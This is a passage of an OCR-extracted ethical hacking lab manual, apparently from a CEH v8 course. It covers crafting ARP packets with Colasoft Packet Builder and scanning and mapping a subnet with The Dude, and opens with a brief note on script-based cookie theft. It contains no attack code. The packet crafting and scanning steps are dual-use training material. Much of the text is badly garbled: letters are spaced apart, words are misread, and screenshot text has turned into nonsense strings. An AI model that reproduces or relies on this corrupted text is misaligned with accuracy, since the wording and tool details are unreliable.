c o d e is a n o d i e r m e c h a n i s m d i a t a n a t t a c k e r c a n u s e f o r s e s s io n h i j a c k i n g : b y d e f a u l t
Q W o r k b o o k r e v ie w
c o o k ie s s t o r e d b y th e b r o w s e r c a n b e r e a d b y J a v a S c r ip t c o d e . T h e in je c t e d c o d e c a n

r e a d a u s e r ’ s c o o k ie s a n d t r a n s m i t d io s e c o o k ie s t o d i e a tt a c k e r .

A s a n e x p e rt e th ic a l h a c k e r and p e n e tra tio n te s te r y o u s h o u l d b e a b le t o p r e v e n t

s u c h a tt a c k s b y v a l id a t in g a ll h e a d e r s , c o o k ie s , q u e r y s tr in g s , f o r m fie ld s , a n d h id d e n

f ie ld s , e n c o d in g i n p u t a n d o u t p u t a n d f i l t e r m e ta c h a r a c te r s i n t h e i n p u t a n d u s in g a

w e b a p p lic a t io n f ir e w a ll t o b l o c k th e e x e c u t io n o f m a lic io u s s c r ip t .

A n o d i e r m e t h o d o f v u ln e r a b ilit y c h e c k in g is t o s c a n a n e t w o r k u s in g th e C o la s o ft

P acket B u ild e r . 111 t h i s la b , you w ill be le a r n about s n iffin g n e tw o rk p a c k e ts ,

p e r f o r m in g A R P p o is o n in g , s p o o f in g th e n e t w o r k , a n d D N S p o is o n in g .

L a b O b je c t iv e s
^ T T o o ls
d em o nstrate d in T h e o b je c t iv e o f d i is la b is t o r e in f o r c e c o n c e p t s o f n e t w o r k s e c u r it y p o li c y , p o li c y
th is lab are e n f o r c e m e n t , a n d p o l i c y a u d it s .
a va ila b le in
D:\CEH- L a b E n v ir o n m e n t
Tools\CEHv8
M odule 03 11 1 d i i s l a b , y o u n e e d :
S canning
■ D:\CEH-Tools\CEHv8 M odule 03
C o la s o f t P a c k e t B u ild e r lo c a t e d a t
N e tw o rks
S canning N etw orks\C ustom P acket C reator\C olasoft P a cke t B uilder

■ A c o m p u te r r u n n in g W indow s Server 2012 as h o s t m a c h in e

C E H Lab M anual Page 250 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

■ W indow 8 r u n n i n g o n v ir t u a l m a c h in e as ta r g e t m a c h in e

■ Y o u c a n a ls o d o w n l o a d d i e l a t e s t v e r s i o n o f A dvanced C olasoft P acket

B uilde r fro m d ie lin k

h t t p : / / w w w .c o la s o ft.c o m / d o w n lo a d /p r o d u c ts /d o w n lo a d _ p a c k e t_ b u ild e r .

php

■ I f y o u d e c id e t o d o w n l o a d d i e la te s t version, d ie n s c re e n s h o ts s h o w n in

d ie la b m ig h t d if f e r .

■ A w e b b r o w s e r w i d i I n t e r n e t c o n n e c t io n n u u iin g i n h o s t m a c liin e

L a b D u r a t io n

T im e : 1 0 M in u te s

O v e r v ie w o f C o la s o f t P a c k e t B u ild e r

C olasoft P acket B uild e r c r e a t e s a n d e n a b le s c u s t o m n e t w o r k p a c k e t s . T h i s t o o l c a n

b e u s e d t o v e r i f y n e t w o r k p r o t e c t i o n a g a in s t a tt a c k s a n d in t r u d e r s . C o la s o f t P a c k e t

B u i l d e r f e a t u r e s a d e c o d i n g e d i t o r a l l o w i n g u s e r s t o e d i t s p e c i f i c p r o t o c o l f i e l d v a lu e s

m u c h e a s ie r .

U s e r s a r e a l s o a b le t o e d i t d e c o d i n g i n f o n n a t i o n i n t w o e d i t o r s : Decode E d ito r and

Hex Editor. U s e r s c a n s e l e c t a n y o n e o f d ie p r o v id e d te m p la te s : E thernet Packet,

IP P acket, ARP P acket, o r TCP Packet.

L a b T a s k s
S t a s k 1
1. In s t a ll a n d la u n c h d ie C olasoft P acket Builder.
S canning 2. L a u n c h th e S ta rt m e n u b y h o v e r in g d ie m o u s e c u r s o r o n th e lo w e r - le f t
N e tw o rk c o r n e r o f th e d e s k to p .

F IG U R E 17.1: W in d o w s S e rv e r 2012 - D e s k to p v ie w

3. C l i c k t h e C o la s o ft P a c k e t B u ild e r 1.0 a p p to o p e n th e C o la s o ft
“Q Y o<u c a n d o w n lo a d
y P a c k e r B u ild e r w i n d o w
C o la s o ft P a c k e t B u ild e r
fro m
h ttp : / / w w w . c o la s o ft. co m .

C E H Lab M anual Page 251 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Administrator
S ta rt

Sew Windows Googte Cotaoft

PowerSM Chrome Pacto?!
Bunder t.O

Es m * * *

compule r control v
1'and Manager
Mochn#.

*J V 91 9

Command U3LWv«r MfrtjpaC*

Prompt Irn-.aljt 0‫י־‬ Studc
Center.
e te r
V 3
s- e .
M euMa Nnwp
r»efax 7«ftmap
GUI

CMtoo $ o

F IG U R E 17.2 W in d o w s S e rv e r 2012 - A p p s

4. T h e C o la s o f t P a c k e t B u ild e r m a in w i n d o w a p p e a rs .

Colasoft Packet Builder 1- = 1 ‫ך־־‬

Fie Edt Send Help

!
#
Import
^

4 $ Oecode Edro*‫־‬
1 S ?’ &
Add Insert
1
Packet No. No pxkec elected:
♦
Checksum
\$Packet Lilt
[As^J 55
Adapter
Packets
Colasoft
0 Selected 0 1
Delta Time Sourer

O p e ra tin g syste m
^ He«Edfcor fatal 0 byte* |
re q u ire m e n ts : >0:0
W in d o w s S e rv e r 200 3 a n d
6 4 - b it E d itio n <L
W in d o w s 2 0 0 8 a n d 6 4 - b it
E d itio n F IG U R E 17.3: C o la s o ft P a c k e t B u ild e r m a in screen

W in d o w s 7 a n d 64-b it
E d itio n
5. B e fo re s ta r tin g o f y o u r ta s k , c h e c k th a t d ie A d a p te r s e t t in g s a re se t to
d e fa u lt a n d d ie n c lic k OK.

Select Adapter *

A d ap ter:

Ph ysical Address D 4 :BE:D 9 :C 3 :C E:2 D 0

Link Sp eed 100.0 l* )p s
M ax Fram e Size 1500 b ytes
IP Address 10.0.0.7/255.255.255.0
D efau lt G atew ay 10.0.0.1
A d ap ter Sta tu s O perational

OK C ancel Help

F IG U R E 17.4: C o la s o ft P a c k e t B u ild e r A d a p te r settings

C E H Lab M anual Page 252 E th ic a l H ackin g and Counterm easures Copyright <0by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

6. T o add 0 1 c r e a t e d i e p a c k e t , c l i c k Add 111 d i e m e n u s e c t i o n .

T h e re a re tw o w a y s to
c re a te a p a c k e t - A d d a n d
In s e rt. T h e d iffe re n c e
b e tw e e n th e s e is th e n e w ly File Edit Send Help
a d d e d p a c k e t's p o s itio n in
th e P a c k e t L is t . T h e n e w 0
ff
p a c k e t is lis te d as th e la s t 1 Import Export‫־״־‬ Insert
Add
p a c k e t in th e lis t i f ad d e d
b u t a fte r th e c u rre n t p a c k e t
[ ^ Decode Editor
i f in s e rte d .

F IG U R E 17.5: C o la s o ft P a c k e t B u ild e r cre a tin g d ie p ack et

7. W h e n an A dd P a cke t d ia lo g b o x p o p s u p , y o u n e e d t o s e le c t d i e t e m p la t e

a n d c lic k OK.
Q c o la s o f t P a c k e t
B u ild e r s u p p o rts * .c s c p k t
Add Packet ‫־‬n n
(C a p s a 5 .x a n d 6 .x P a c k e t
F ile ) a n d * c p f (C a p s a 4.0
P a c k e t F ile ) fo rm a t. Y o u Select Template: ARP Packet
m a y a ls o im p o rt d a ta fro m
‫ ״‬.c a p (N e tw o r k A s s o c ia te s
S n iffe r p a c k e t file s ), * .p k t
Delta Time: 0.1 Second
(E th e r P e e k v 7 / T o k e n P e e k /
A 1 ro P e e k v 9 / O m n iP e e k v 9
p a c k e t file s ), * .d m p (T C P
D U M P ), a n d * ra w p k t (ra w
p a c k e t file s ).

OK Cancel Help

F IG U R E 17.6: C o la s o ft P a c k e t B u ild e r A d d P a c k e t d ia lo g b o x

8. Y ou can v ie w d ie added p a c k e ts lis t 0 11 y o u r r i g h t - h a n d s id e o f y o u r

w in d o w .

Packet List Packets 1 Selected 1

S t a s k 2 _______ U sl______ Delta Tims . S o u r c e D e s tin a tio n _______,

1 0.100000 00:00:00:00:00:00

Decode E ditor
F IG U R E 17.7: C o la s o ft P a c k e t B u ild e r P a c k e t L is t

9. C o la s o f t P a c k e t B u ild e r a llo w s y o u t o e d it d ie decoding in f o r m a t io n i n d ie

t w o e d it o r s : Decode E ditor and H ex Editor.

C E H Lab M anual Page 253 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Decode Editor
Packet: Num:000001 Length:64 Captured:•
B-© Ethernet Type I I [0/14]
le s tin a tio n Address: FF: FF: FF: FF: FF: FF [0/6]
J© Source Address: 00:00:00:00:00:00 [6/6]
Q B u s t M o d e O p tio n : I f
j ! ^ P r o to c o l: 0x0806 (ARP) [12.
y o u c h e c k th is o p tio n , - sj ARP - Address Resolution Protocol [14/28]
C o la s o ft P a c k e t B u ild e r
!••••<#>Hardware type: 1 (Ethernet)
se n d s p a c k e ts o n e a fte r
a n o th e r w ith o u t ! ‫ץ‬#( Protocol Type: 0x0800 [16/2]
in te rm is s io n . I f y o u w a n t to j..© Hardware Address Length: 6 [18/1]
s e n d p a c k e ts a t th e o rig in a l
‫ן‬..© Protocol Address Length: 4 [19/1]
d e lta tim e , d o n o t c h e c k
th is o p tio n . ! |—<#1ype: 1 (ARP Reque.
\ -^J>S0urce Physics: 00:00:00:00:00:00 [22/6]
j3 ‫ ״‬Source IP : 0.0.0.0 [28/4]
D estination Physics: 00:00:00:00:00:00 [32/6]
j D estination IP : 0.0.0.0 [38/4]
- •© Extra Data: [42/18]
Number of Bytes: 18 bytes [42/18]
FCS:
L # FCS: 0xF577BDD9

■<l— 111 j ...... ; ......,.... ‫־‬.... ‫>״‬J

F IG U R E 17.8: C o la s o ft P a c k e t B u ild e r D e c o d e E d ito r

^ Hex Editor Total 60 bytes

0000 FF FF FF FF FF FF 00 00 00 00 00 00 08 06
000E 00 01 08 00 06 04 00 01 00 00 00 00 00 00
001C 00 00 00 00 00 00 00 00 00 00 00 00 00 00
002A 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0038 00 00 00 00 ....
V

F IG U R E 17.9: C o la s o ft P a c k e t B u ild e r H e x E d ito r

1 0 . T o s e n d a ll p a c k e ts a t o n e t im e , c lic k Send All f r o m d ie m e n u b a r.

11. C h e c k d ie Burst Mode o p t io n i n d ie Send All Packets d ia lo g w in d o w , a n d

d ie n c lic k Start.

‫ר‬
£ 0 1 O p tio n , L o o p S e n d in g :
^4 C o la s o f t C a p s a
T h is d e fin e s th e re p e a te d
tim e s o f th e se n d in g Jown Checksum Send Send All Packet Analyzer
e x e c u tio n , o n e tim e in
d e fa u lt. P le a s e e n te r z e ro i f 1 Packet List Packets 1 Selected 1
y o u w a n t to k e e p se n d in g
No. Delta Time Source Destination
p a c k e ts u n til y o u p a u se o r
s to p it m a n u a lly . 1 0.100000 00:00:00:00:00:00 FF:FF:FF:FF:FF:FF

F IG U R E 17.10: C o la s o ft P a c k e t B u ild e r S e n d A ll b u tto n

C E H Lab M anual Page 254 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

£ 3 S e le c t a p a c k e t fro m
th e p a c k e t lis tin g to a c tiv a te
S e n d A ll b u tto n

F IG U R E 17.11: C o h s o ft P a c k e t B u ild e r S e n d A H P a c k e ts

12. C lic k S ta rt

Send All Packets

O p tions

A d a p te r: R e a lte k P C Ie G 8 E Fam rfy C o n tro ller Select...

□ B u rs t M ode (n o d e la y b e tw e e n p a ck e ts)

□ Lo op S e n d n g : 1 A loops (z e ro fo r in fin ite lo o p )

-
D e la y B e tw e e n Lo o p s: 1000 A
1000 m illiseconds
-

Sen d in g In fo rm a tio n

£ 0 T h e p ro g re s s b a r T o tal P a c k e ts : 1
p re s e n ts a n o v e r v ie w o f th e
s e n d in g p ro c e s s y o u are P a c k e ts S e n t: 1
e n g a g e d in a t th e m o m e n t.
P ro g re ss:

S ta r t S to p C lo se H elp

F IG U R E 1 7 .12 C o la s o ft P a c k e t B u ild e r S e n d A H P a c k e ts

13. T o e x p o rt d ie p a c k e ts sent fro m d ie F ile m enu, s e le c t

F ile ‫ ^־‬E x p o rt‫ ^־‬A ll Packets.

C E H Lab M anual Page 255 E th ic a l H ackin g and Counterm easures Copyright <0by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

‫ י‬li‫״‬ ‫ר״‬
Colas

File Edit Send Help

Import...
1* 0 1 ‫ ׳‬a X
10 Export ► All Packets... glete

Exit ^ Selected Packets... ketNo. |_ jJ I

+^T Packet: Num: 00(
El••© E thernet Type I I ] 0/14[ ‫ן‬
^ D e s tin a tio n Address: FF: FF:1
Source Address: 00:00:( ,

F IG U R E 17.13: E x p o r t A ll P a c k e ts p o tio n

Save As x I
Q O p tio n , P a c k e ts S e n t
T h is s h o w s th e n u m b e r o f 5avein‫!"! ־‬:o la e c -ft
p a c k e ts s e n t s u c c e s s fu lly .
f lf c l Nome D«tc modified Type
C o la s o ft P a c k e t B u ild e r
No items match your search.
d is p la y s th e p a c k e ts se n t
Rcccnt plocca
u n s u c c e s s fu lly , to o , i f th e re
is a p a c k e t n o t s e n t o u t.
■
Desktop

< 3
Libraries

lA f f

Computer

Network
r n _______ ... [>1
F1Un»m* | Fjiekct• e « c p ld v j Sav•

S»v• •c typ♦ (Colafloft Packot Rio (v6) (*.oocpkt) v | C«rc«l |

F IG U R E 17.14: S e le c t a lo c a tio n to save th e ex p o rted file

Packets.cscpkt

F IG U R E 17.15: C o la s o ft P a c k e t B u ild e r e x p o rtin g p ack et

L a b A n a ly s is

A n a l y z e a n d d o c u m e n t d i e r e s u l t s r e l a t e d t o t h e l a b e x e r c is e .

T o o l/U tility In fo r m a tio n C o lle c t e d / O b je c t iv e s A c h ie v e d

A d a p t e r U s e d : R e a lte k P C I e F a m ily C o n t r o lle r

C o la s o ft P a c k e t
S e le c t e d P a c k e t N a m e : A R P P a c k e ts
B u ild e r

R e s u lt : C a p tu r e d p a c k e ts a re s a v e d i n p a c k e ts .c s c p k t

C E H Lab M anual Page 256 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .

Q u e s t io n s

1. A n a ly z e how C o la s o ft P a c k e t B u ild e r a ffe c ts y o u r n e tw o rk tr a ffic w h ile

a n a ly z in g y o u r n e t w o r k .

2. E v a lu a te w h a t ty p e s o f in s t a n t m e s s a g e s C a p s a m o n it o r s .

3. D e te r m in e w h e t h e r d ie p a c k e t b u f f e r a ffe c ts p e r fo r m a n c e . I f y e s , th e n w h a t

s te p s d o y o u ta k e t o a v o id o r r e d u c e it s e f f e c t o n s o ft w a r e ?

In t e r n e t C o n n e c tio n R e q u ir e d

□ Y es 0 N o

P la tfo r m S u p p o rte d

0 C la s s r o o m 0 iL a b s

C E H Lab M anual Page 257 Eth ica l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Lab

S canning D evices in a N etw ork

Using T h e Dude
I CON KEY The D n d e automatically scans all devices within specified subnets, draws a n d lays out
a w a p of y o ur networks, monitors services ofy ou r devices, a n d a/eftsyon in case
5 V a lu a b le

in fo r m a tio n some service hasp roblems.

Test your
k n o w le d g e
L a b S c e n a r io

W e b e x e r c is e 111 t h e p r e v io u s la b you le a r n e d ho w p a c k e ts can be c a p tu re d u s in g C o la s o ft

P a c k e t B u ild e r . A tta c k e r s t o o c a n s n i f f c a n c a p t u r e a n d a n a ly z e p a c k e t s f r o m a
W o r k b o o k r e v ie w
n e tw o rk and o b ta in s p e c if ic n e tw o rk in fo r m a t io n . The a tta c k e r can d is r u p t

c o m m u n ic a tio n b e tw e e n h o s ts a n d c lie n ts b y m o d if y in g s y s te m c o n fig u r a tio n s ,

o r t h r o u g h th e p h y s ic a l d e s t r u c t io n o f th e n e t w o r k .

A s a n e x p e r t e th ic a l h a c k e r, y o u s h o u l d b e a b l e t o g a d i e r i n f o r m a t i o n 0 11

o rg a n iz a tio n s n e tw o rk to c h e c k fo r v u ln e ra b ilitie s and fix th e m b e fo re an

a tta c k e r g e ts to c o m p ro m is e th e m a c h in e s using th o s e v u ln e ra b ilitie s . I f
you d e te c t any a tta c k th a t has been p e rfo rm e d 0 11 a n e t w o r k , im m e d ia t e ly
im p le m e n t p r e v e n t a tiv e m e a s u re s t o s to p a n y a d d itio n a l u n a u th o r iz e d a c c e s s .

111 t h i s l a b y o u w i l l le a r n t o u s e T h e D u d e t o o l t o s c a n t h e d e v ic e s i n a n e t w o r k

a n d th e t o o l w i l l a le r t y o u i f a n y a tt a c k h a s b e e n p e r f o r m e d 0 11 t h e n e t w o r k .

L a b O b je c t iv e s

T h e o b j e c t i v e o f t h i s l a b i s t o d e m o n s t r a t e h o w t o s c a n a l l d e v ic e s w i t h i n s p e c i f i e d

s u b n e t s , d r a w a n d l a y o u t a m a p o f y o u r n e t w o r k s , a n d m o n i t o r s e r v ic e s 0 11 d i e
n e tw o rk .

V—J Tools
d em o nstrate d in L a b E n v ir o n m e n t
th is lab are
T o c a r r y o u t th e la b , y o u n e e d :
a va ila b le in
D:\CEH- ■ T h e D u d e is lo c a t e d a tD:\CEH-T0 0 ls\C EH v8 M odule 03 S canning
Tools\CEHv8 N e tw o rk s \N e tw o rk D is c o v e ry and M apping T o o ls\T h e Dude
M odule 03 ■ Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f The Dude fro m th e
S canning h ttp : / / w w w .m ik r o tik .c o m / th e d u d e .p h p
N e tw o rks

C E H Lab M anual Page 258 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

■ I f y o u d e c id e t o d o w n l o a d t h e la t e s t v e r s io n , t h e n s c re e n s h o ts show n

i n th e la b m ig h t d if f e r

■ A c o m p u te r r u n n in g W in d o w s S e rv e r 2 0 1 2

■ D o u b le - c lic k d ie The Dude a n d f o l l o w w i z a r d - d r iv e n in s t a lla t io n s te p s t o

in s t a ll The Dude

■ A d m i n i s t r a t i v e p r iv ile g e s t o r u n t o o ls

L a b D u r a t io n

T im e : 1 0 M in u te s

O v e r v ie w o f T h e D u d e

T h e D u d e n e t w o r k m o n i t o r is a n e w a p p lic a t io n d i a t c a n d r a m a t ic a lly i m p r o v e d ie

w a y y o u m a n a g e y o u r n e t w o r k e n v i r o n m e n t I t w i l l a u t o m a t i c a l l y s c a n a l l d e v ic e s
w i t h i n s p e c i f i e d s u b n e t s , d r a w a n d l a y o u t a m a p o f y o u r n e t w o r k s , m o n i t o r s e r v ic e s

o f y o u r d e v ic e s , a n d a l e r t y o u i n c a s e s o m e s e r v ic e l i a s p r o b l e m s .

L a b T a s k s

1. L a u n c h th e S ta rt m e n u b y h o v e r in g th e m o u s e c u r s o r o n th e lo w e r - le f t

c o r n e r o f th e d e s k to p .

i| Windows Server 2012

Ser*? 2012M«a1e CandWateDitaceM*

____________________________________________________________________________Ev^mbonoopy BuildWX:

F IG U R E 18.1: Windows Server 2012 - Desktop view

E t a s k 1 1 1 1 t h e S ta rt m e n u , t o l a u n c h T h e Dude, c l i c k T he Dude i c o n .

Launch The Dude

S ta rt
Administrator ^

Server Computer
Maiwgcr Onm SS?
b U * f>

~ e
v - —1 ‫יי‬
M m n ttr. command 1n»0u0f
T<xJ1 Prompi

0—l»p

C E H Lab M anual Page 259 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

F IG U R E 182 : W in d o w s S e rv e r 2012 - S ta rt m e n u

3. T h e m a in w in d o w o f The Dude w ill a p p e a r.

fS m m adm in@ localhost - The Dude 4.0beta3 ’ - l ° l X ‫י‬

(§) 5references 9 Local Server H do jjy i2 m c * ‫״‬ m

Setting* CJ
O * Ssttnst j Cikovot *70011 W ‫•־‬. .*.‫ ־‬Lay* irk( V J
Contert* 71S E 1
□ A3<*T3S USS
A Admn#

H 0 ‫»ו»י‬
H D*wic«»
?5? Flea 5
□ Functona
M Htfay Action*
H Lntu
□ Lc0*
£7
£7 Cecus -A
£ 7 &‫׳‬em
£7 Syslog
E Notic?
- B Keftroric Maps
B Lccd
t- ! U n i r t i J

[.Ca 1MU«d Cterl. w Uj « /U 334 bw« S*‫׳ ״*־‬x215bc*.'UM2bc«

F IG U R E 18.3: M a in w in d o w o f T h e D u d e

4. C lic k th e D is c o v e r b u t t o n o n th e t o o lb a r o f d ie m a in w in d o w .
---- -------------- — ■■
admin@localhost - The Dude 4.0beta3 . ‫ ״‬1 x

® 5reference* 9 Local Seiver *b rh tZ 3 E ®

a c‫׳‬ * IIIIJH b
o * Sottrco Dkov* ‫* | ־‬Too• ‫•־‬. •v ‫| ?יי׳‬lrk* _d 2
Ca-ite‫*!־׳‬ -1+‫״‬
Q Addra# list*
A ‫׳‬vamro

□ 0 ‫יו*ו‬
f‫“־‬l OmiaN
f * . Ftea ‫י‬
f=1 F_nccon8
B Haay Action*
n 1^‫“*י‬
□ Legs
£ ? ActJcn
£7 Defcus
£7 Event
£7 Sjobg
R Mb Notie?
- Q Network Maos
B Lccdl
M '‫׳‬

|!Corrected Cfert. ix $59bus /tx 334bp* :«<* a215bc«<'u642bc«

F IG U R E 18.4: S e le c t d is c o v e r b u tto n

5. The D e vice D is c o v e ry w in d o w a p p e a rs .

C E H Lab M anual Page 260 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Device Discovery

General Services Device Types Advanced Discover

Enter subnet number you want to scan for devices Cancel
Scan Networks: 110.0.0.0/24

Agent: |P£g? !-
P Add Networks To Auto Scan
Black List: |1

Device Name Preference: |DNS. SNMP. NETBIOS. IP

Discovery Mode: (• fast (scan by ping) C reliable (scan each service)

Recursive Hops: ‫פ ר ־ י ו‬ / ‫י‬ I I I I I I I I

2 4 6 8 10 14 20 50

F Layout Map /tfter Discovery Complete

F IG U R E 18.6: D e v ic e d is c o v e ry w in d o w

6. 111 t h e D e v i c e D i s c o v e r y w i n d o w , s p e c i f y S can N e tw o rk s r a n g e , s e l e c t
d e fa u lt fro m d ie A g e n t d ro p -d o w n DNS, SNMP, NETBIOS.
l i s t , s e le c t

and IP f r o m d ie D e vice N am e P re fe re n ce d r o p - d o w n lis t, a n d c lic k

D iscover.

Device Discovery

General Services Device Types Advanced

number you want to scan for

Scan Networks: (10.0.0.0/24

Agent: 5 S S H B I
r Add Networks To Auto Scan
Black List: [none

Device Name Preference DNS. SNMP. NETBIOS. IP

Discovery Mode (• fast (scan by ping) C reliable (scan each service)
3
0
Recursive Hops: [1 ]▼] /—r ‫ —ו —ר‬1 —1 — 1 ------------------------------------------
2 4 6 8 10 14 20 SO

I- Layout Map /tfter Discovery Complete

F IG U R E 18.7: S e le ctin g d e vic e n am e p re fe re n ce

7. O n c e t h e s c a n is c o m p l e t e , a ll t h e d e v ic e s c o n n e c t e d t o a p a r t i c u l a r

n e t w o r k w i l l b e d is p la y e d .

C E H Lab M anual Page 261 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

adrmn@localhost The Dude 4.0beta3 ‫־‬f t ^ t

11d Locd •fat
Sanhfla!_ 11■ s
Ccrtemt____________ +-_ C: _e [o * | Secpy I |Dhcovef | ^Tooia tt 1a s ‫י‬- |l‫־‬ks ^ 209m
: [10
f~l *ricteo Lata
Adnns4.
B« * < 2 □
‫ ק‬Chats
Qy .t •
Oevteaa □ WW*IXY858KH04P WIN.D39MR5HLSE-: AOMN
‫*׳‬- * Pie (DU I 9 N tn c n t 63 % vM: 27% disk 75%
»Q Fu1dion
»et10n*07*40
H 1-‫׳*י״‬
\ I
□ ‫י‬-00«
£7^ 6•‫י‬ MflMMrtttLCXUUl * ‫י‬
w in ? U 't '. ic . '. - t f s
N.
\
‫י‬
L f Uofcoa
L?rv«n1
asy*B ‫ ב רז‬- ‫^ נ‬ ‫א‬ ‫ו‬
□ tob>10«m
d n ‫ *ס״״^־ז‬Map*
Q Local
‫ ק‬r‫־‬fcnwortc»
Q NotActfont
H□ PjTriS
Q adrrin 127.0,0.1
Q P t 638
5> Sennco
Q Tcde

VI1hK.K0H)1m3^M

Qm - ‫׳‬x 3 2 5 ■
‫ ׳‬oc« ‫ ׳‬w I 95bpj Saver r 1 ( ( 4 (>> * 3 9 t®c«

F IG U R E 1 8 .8 : O v e r v i e w o f n e t w o r k c o n n e c t i o n

8. Select a device and place d ie mouse cursor o n i t to display the detailed

in fo rm a tio n about d ia t device.

C artvM
♦• ‫ ״‬% j o ^ StfttKujo Dwovw ~*1Zoom
. [TO
5 Ad<*«3a Lota
A Admr*
R Afl*rta
□ Chat* t f t t e O T . JLYKSO-Ci P Wrdcvnaxnpucr‘,
Q 08V1008 IP• 100 0 9
M
ACCtt ■- 10
^ Plea
Q Functions S*'42 m (7V
U > i 1 Q r«0 0 a 1C2 coj fn&nory vrtuai memoiy. cfck
□ HatovV*•*® SjcrT!‫ז‬.‫*־״‬.vw.-’.‫׳‬-Y35am3ip
□ Lnk* C esacto- -fc*».=«e ntes« Famly G Wsdd 42 9eppng 7 M/MCOUPATBU - V irc 0*5 I t o i a i 6 & End
‫ □ ־‬Lcoa 6001WipxnsrFix)
]J? Acton Ipwue 0028‫<־‬J771
C7 Detua
£? Ewr
L7S«bg
Mb Mod*®
B rielwork Maps
B local
n NHwwk•
2 N9Ulc4B0r•
Q Parris
H•*™ 127.00.1 1‫ג‬4< ‫«נו‬ )>«• n-n
□ P‫׳‬cN» J?*
I !_•« a M■ «L'
I? •#
iwttdai e UU liriM M O ll- ■ ••:‫ י‬uUCMKJP
Q> Samcas
H Tocte

12:3 u:a 12:40 12: X 1*•: 13:ta

I ecu • | mdiv 0 vnn-uiYKBocnP ■ . W * ‫־‬. n m ‫־‬, t «W -ll‫־‬r8!a.H0TP
lam 0 «■ a.'iaaeoip

C V t m 2 4 5 Upa/tx 197bpa n .1 5 4 ttp a /fc 3 3 k b c «

F IG U R E 1 8 .9 : D e t a i l e d i n f o r m a t i o n o f t h e d e v i c e

9. N o w , c lic k the d o w n a rro w fo r die L o ca l d ro p -d o w n lis t to see

in fo rm a tio n o n H is to ry A c tio n s , T o o ls, F iles. Logs, and so on.

C E H Lab M anual Page 262 E th ic a l H ackin g and Counterm easures Copyright © by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

F IG U R E 1 8 .1 0 : S e le c tin g L o c a l i n f o r m a t i o n

10. Select o p tio n s fro m d ie d ro p -d o w n lis t to v ie w com plete in fo rm a tio n .

adm!r1@iocalha5t ‫ ־‬The Dude 4.0beta3 ‫ ־ < _ ־‬X ‫־‬,
® | | Preferences | f r Local Swar Heb
•O SetBngj e• I ~
Co‫׳‬not? , M S «
Q Add's** Lilt( Aden
4 ‫יי‬4 ‫י‬1‫! ו‬ ‫ ו‬u 130245 NttwOlk Map Be‫׳‬nrfl dn1£1‫*׳‬d
Q *s»t‫״‬U 2u 13024CNer*e«k Map Be‫׳‬n»ntchanjed
□ Owl• 3u 13024S fJrtocik Map btmrU 1l»a•‫׳‬
r*1 LVvn.•* au 130;49Netv«ak Map B1‫׳־‬r*«changed
‫ *׳‬Fto* 5U 1302S0 fM o w k Map blvw 'i:Jw j*0
Q I undior• cu 130?5? Httitcik Map Bf«wmchanged
□ IMay/towns 7U 130254 fM o cik Map H »w1!(.11•‫׳‬j«0
M U K» fi U (302K Merwak Map Bememchanged
‫ □ >־‬Logs 9u 130258 fjnC*«k Map b c w : changtd
£7A=
<10n 10 u 130340tkfmcik Map Bemem changed
£? Debug ‫ וו‬u 130302 NttWClk Map Be lt# ills' jeO
£ 7 E v « rf 12 u 1303-03lJer«e(k Map Berotm changed
£? Stfog 13U 13.03.06 r«(.«c«k Map 0c1‫*׳‬s‫׳‬r. da'jed
‫ ם‬Mb Me** 14 U 130348liefMCik Map Beroen: changed
15U 13.03.14 ta t« a k Map Bc1*‫׳‬T.cha'Sed
•6 U 130316tieCMdk Map B fw t changed
7‫ ו‬u 13.03.20 Netwak Map B wnertchanoed
16 U 130322I jefMCik Map Berne'S changed
19U 130324 heCaak Map Bw mnlchrxl
20 u 130327Net‫*־‬c«k Map Beroen! changed

Crr«<t«J 0 *rt «9 17kbpa/|x 1 I2kbp« S«nv‫ ־‬a 3?4Ktv* ■» H ?*ten

a d ^ n ^ io c a lh o s t - The Dude 4,Obela3 ‫־‬ a *

® fafaenoee O toca s«n ih ti^ rS S B S S X S A l
*‫־‬ ‫׳*״‬
oI GrtBfgj L‘ _ ..L J U

Conterts
3 Address Usts Type, (* 3 M * f‫^ ־ ־‬i T] □ ‫י‬
£ AcJ-rriS i l l l
Q Ao-nls L^v:c UiZ.-r'tnT‫׳‬,c«‫>־‬ Mao
gowns 100a! j«-=le Local
Q Devicw 1000.12 incte Local
1000255 MTCfc Local
5!‫ ׳‬Fte»
Q Functor• ADVf, iincte Local
